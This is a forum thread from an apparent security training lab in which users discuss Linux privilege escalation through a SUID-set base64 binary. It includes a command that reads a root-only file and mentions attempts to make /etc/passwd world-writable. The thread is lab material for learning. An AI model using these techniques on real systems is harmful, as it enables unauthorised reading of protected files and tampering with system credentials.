Forum Discussion

gwenael's avatar
gwenael
New Member I
3 hours ago
Solved

Privilege Escalation: Linux – Demonstrate Your Skills

Hello,

I’m doing the Lab "Privilege Escalation: Linux – Demonstrate Your Skills".

I’m stuck on the second part regarding the FILE-SRV-DEV, I’ve found with linPEAS a file ( /usr/bin/base64) with the SUID but I don’t know if I am on the right way, when I try to use it I get "permission denied".

Am I on the right way by trying to use base64 file ?

Thanks in advance,

Gwenael

help & support
immersive labs
  • steven's avatar
    steven
    2 hours ago

    hmm.. on FILE_SRV-DEV you should just execute base64 and the file you want to see.
    with SUID rights you'll see the content (as base64) so just revert it :)

    merle@file-srv-dev:/tmp$ base64 /root/escalated.txt | base64 -d

    Privilege Escalation Completed -- FILE-SRV-DEV ✅

    once you did this try to figure out how the server gets backuped and how you can interfere.

2 Replies

Sort By
  • steven's avatar
    steven
    Icon for Silver I rankSilver I
    2 hours ago

    hmm.. on FILE_SRV-DEV you should just execute base64 and the file you want to see.
    with SUID rights you'll see the content (as base64) so just revert it :)

    merle@file-srv-dev:/tmp$ base64 /root/escalated.txt | base64 -d

    Privilege Escalation Completed -- FILE-SRV-DEV ✅

    once you did this try to figure out how the server gets backuped and how you can interfere.

    • gwenael's avatar
      gwenael
      New Member I
      53 minutes ago

      Thank you Steven,

      Simpler than I was trying and doesn’t work 🙂

      echo "cmd" | base64 (with cmd= cp /etc/passwd /tmp/passwd or chmod 777 /etc/passwd etc …)

      echo hashcmd | base64 -d | bash